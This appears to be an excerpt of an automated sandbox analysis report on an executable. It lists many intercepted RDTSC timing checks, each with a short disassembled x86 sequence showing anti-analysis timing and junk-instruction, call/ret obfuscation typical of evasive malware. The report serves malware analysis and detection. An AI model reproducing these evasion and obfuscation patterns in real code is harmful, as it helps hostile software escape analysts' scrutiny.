Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B412AD second address: B412B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B412B1 second address: B412D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D3B5Dh], edx 0x0000000e push 00000000h 0x00000010 mov ebx, edi 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+12460D56h], eax 0x0000001a adc bx, BAA5h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push esi 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B412D8 second address: B412DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B412DD second address: B412E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3C496 second address: B3C4A0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A0CE39ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3C4A0 second address: B3C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91A0CEF8AEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B443D0 second address: B443D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B443D5 second address: B44451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F91A0CEF8A8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 add dword ptr [ebp+1245FC4Fh], ecx 0x0000002a jmp 00007F91A0CEF8ABh 0x0000002f push 00000000h 0x00000031 sub bx, 85B5h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F91A0CEF8A8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 jns 00007F91A0CEF8A6h 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B44451 second address: B44457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B3F38A second address: B3F38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B44457 second address: B4445B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B42496 second address: B4249D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B452DD second address: B452E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B445D7 second address: B445DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B45379 second address: B45380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B44691 second address: B44697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B45380 second address: B45391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F91A0CE39A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B44697 second address: B4469B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B46479 second address: B464D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D3AF6h], esi 0x0000000d or bx, 2E58h 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+12457D8Ch], ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F91A0CE39A8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 movzx ebx, cx 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F91A0CE39B5h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B464D0 second address: B464D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B464D4 second address: B464E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4A3DF second address: B4A3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4C4B3 second address: B4C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F91A0CE39A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4C4C0 second address: B4C4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4A54B second address: B4A550 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4C4C4 second address: B4C536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F91A0CEF8A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 xor ebx, 4744056Bh 0x0000002a mov ebx, dword ptr [ebp+122D3017h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F91A0CEF8A8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3A1Dh], eax 0x00000052 push 00000000h 0x00000054 mov ebx, eax 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a push eax 0x0000005b pop eax 0x0000005c pop ebx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4A550 second address: B4A5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F91A0CE39A8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr [ebp+122D1C36h], ecx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov ebx, dword ptr [ebp+122D3017h] 0x0000003c mov eax, dword ptr [ebp+122D0959h] 0x00000042 sub bx, 2712h 0x00000047 mov ebx, dword ptr [ebp+122D3DEDh] 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007F91A0CE39A8h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F91A0CE39AFh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4D565 second address: B4D5AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2E2Ah], esi 0x00000010 push 00000000h 0x00000012 mov di, bx 0x00000015 push edi 0x00000016 mov bx, di 0x00000019 pop edi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F91A0CEF8A8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 adc di, CC8Dh 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4C6BD second address: B4C6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4C6C3 second address: B4C6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4D6D9 second address: B4D6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F91A0CE39A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B4D6E3 second address: B4D6F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B52194 second address: B521B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007F91A0CE39ADh 0x0000000b jmp 00007F91A0CE39ACh 0x00000010 pop edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5A12A second address: B5A131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5A131 second address: B5A13D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F91A0CE39A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5A13D second address: B5A14B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F91A0CEF8B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5A14B second address: B5A151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5A151 second address: B5A162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jne 00007F91A0CEF8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B59B77 second address: B59B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F91A0CE39A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B59B81 second address: B59B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F91A0CEF8AAh 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jg 00007F91A0CEF8ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B59CE9 second address: B59D04 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0CE39A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 jnp 00007F91A0CE39CFh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B59D04 second address: B59D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5F062 second address: B5F07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F91A0CE39ACh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5F07C second address: B5F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5F081 second address: B5F0A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F91A0CE39A6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F91A0CE39B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5F0A5 second address: B5F0DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F91A0CEF8B5h 0x0000000f jng 00007F91A0CEF8ACh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edi 0x0000001b jns 00007F91A0CEF8ACh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B5F248 second address: B5F24E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B64040 second address: B6404E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F91A0CEF8A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6404E second address: B64059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B64059 second address: B6405D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B634C4 second address: B634CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B634CA second address: B634D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B634D0 second address: B634D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B634D6 second address: B634DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B634DC second address: B634E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B63677 second address: B63692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8B5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B63692 second address: B63696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B63696 second address: B636B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F91A0CEF8B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B636B5 second address: B636CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B636CA second address: B636D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B636D6 second address: B636DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6396D second address: B63978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B681F7 second address: B68216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F91A0CE39B7h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6833C second address: B68361 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0CEF8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F91A0CEF8AAh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68361 second address: B68365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68365 second address: B68375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F91A0CEF8A6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B684EC second address: B684F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68938 second address: B6893C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68A5B second address: B68A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68A64 second address: B68A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68C1B second address: B68C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F91A0CE39A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68C25 second address: B68C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68C2A second address: B68C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68D7B second address: B68D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B68EF2 second address: B68EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B69079 second address: B6907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6907D second address: B69081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6924D second address: B69260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CEF8ADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B67F13 second address: B67F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6C77A second address: B6C780 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B70BD5 second address: B70BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0CE39ABh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B70BE8 second address: B70BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B6FB0C second address: B6FB26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0CE39A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F91A0CE39AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
